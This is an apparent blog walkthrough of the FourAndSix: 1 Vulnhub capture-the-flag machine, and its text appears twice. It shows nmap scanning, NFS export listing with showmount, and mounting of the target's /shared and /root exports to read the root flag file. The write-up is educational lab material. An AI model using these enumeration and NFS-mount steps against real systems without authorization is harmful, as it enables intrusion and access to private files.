FourAndSix: 1 CTF VULNHUB Walkthrough/Writeup:
Today we will be looking at FourAndSix: 1 CTF Vulnhub Challenge by Fred which was uploaded on Vulnhub.com. It is a entry level, beginner friendly CTF suitable for noobs.
![]()
As no description is provided by the author on vulnhub we assume we need to gain root access and capture the flag as most of the case.
You can download this machine by clicking here.
Lets Get Started:
nmap -sV -sC -A 192.168.43.136 -vv -p-
Well we can clearly see that the port 2049 is running NFS(Network File System) service and must have an export available to mount :D
Network File System(NFS) allows remote hosts to mount file system over a network. For this NFS server export a directory which can be mounted remotely.
Lets check for the available mounts:
So we got our export available and it is shared with everyone in the /shared directory on the server.
Its time to mount it. So create a directory first for the export to mount and mount it on your system.
we found a image(.img) file in /shared directory of out export. Lets try to mount it and see if we find something interesting.
![]()
but got no luck.
We need to access root directory in order to get the root flag so lets try to mount the root directory if we can.
![]()
And in the root directory mount we have a file names proof.txt
Let us check the content of the text file proof.txt
cat proof.txt
![]()
And Voila!! we have our root flag!
Today we will be looking at FourAndSix: 1 CTF Vulnhub Challenge by Fred which was uploaded on Vulnhub.com. It is a entry level, beginner friendly CTF suitable for noobs.
As no description is provided by the author on vulnhub we assume we need to gain root access and capture the flag as most of the case.
You can download this machine by clicking here.
Lets Get Started:
FourAndSix: 1 CTF VULNHUB Walkthrough/Writeup
After getting the IP address of the machine we hit nmap for the available ports and servicesnmap -sV -sC -A 192.168.43.136 -vv -p-
Nmap scan report for fourandsix (192.168.43.136)
Host is up, received arp-response (0.00081s latency).
Scanned at 2018-07-23 19:38:36 IST for 681s
Not shown: 65531 closed ports
Reason: 65531 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 1c:8a:0e:a7:ae:6a:72:ab:c8:88:db:0b:fc:7d:53:c0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxwYsIPtgzrJCCBfDxQaA4eMOcJGfP7ioV4nTzwMGKyCryOrCcsBIk9X++SMbXb2Sxlq+XYhBa9nMT2abfOUAuh3LcW+DB+ndMqSEgI/w2wqCR3vL8wT6+Pig+lflh4aIWDXULRKBjNAf9c1rdJ1tt4SYEsEDJ807HVb5Rg2hulibVgp095/EpTyB2vG6ig9zo4rqt0sPF6oc+yaIxld9GrnUxueAkPqw/qwIGO0TIzkuUnZOCmaRT0BnPv6meQQIvy2GiQM8gU+Fk9AceD6YE9iC08wB3nbo8E8A1DHvOCbhBhW/RW5kQ8VFJxdWxTXquKe74S7sfDeZ/lNGyATI7
| 256 8a:9e:af:85:ef:41:51:54:ee:14:35:9d:78:46:cd:56 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKuhzpuMVn0mCPSETswV/gJYan5nphdhOcpOwOBNkIPb2p7h6reh9a5k2h9KyG5XeAqNW5V3wFTJmEfZCzOAvPM=
| 256 0f:42:83:da:a5:7e:53:9c:a5:21:e4:3f:8a:d8:ad:28 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG6mHUNP/Xzjw55bhOsx0amSUeEgZifBUpf8y/G4QWR0
111/tcp open rpcbind syn-ack ttl 64 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3 2049/tcp nfs
| 100003 2,3 2049/udp nfs
| 100005 1,3 787/tcp mountd
|_ 100005 1,3 858/udp mountd
787/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)
2049/tcp open nfs syn-ack ttl 64 2-3 (RPC #100003)
MAC Address: 08:00:27:09:69:05 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: OpenBSD 6.X
OS CPE: cpe:/o:openbsd:openbsd:6
OS details: OpenBSD 6.0 - 6.1
Well we can clearly see that the port 2049 is running NFS(Network File System) service and must have an export available to mount :D
Network File System(NFS) allows remote hosts to mount file system over a network. For this NFS server export a directory which can be mounted remotely.
Lets check for the available mounts:
showmount -e 192.168.43.136
Export list for 192.168.43.136:
/shared (everyone)
So we got our export available and it is shared with everyone in the /shared directory on the server.
Its time to mount it. So create a directory first for the export to mount and mount it on your system.
mkdir /tmp/CTF
mount -t nfs 192.168.43.136:/shared /tmp/CTF
we found a image(.img) file in /shared directory of out export. Lets try to mount it and see if we find something interesting.
mkdir usb_stick
mount USB-stick.img usb_stick/
cd usb_stick/
ls -la
but got no luck.
We need to access root directory in order to get the root flag so lets try to mount the root directory if we can.
mkdir root
mount -t nfs 192.168.43.136:/root /tmp/CTF/root/
cd /tmp/CTF/root
ls -la
And in the root directory mount we have a file names proof.txt
Let us check the content of the text file proof.txt
cat proof.txt
And Voila!! we have our root flag!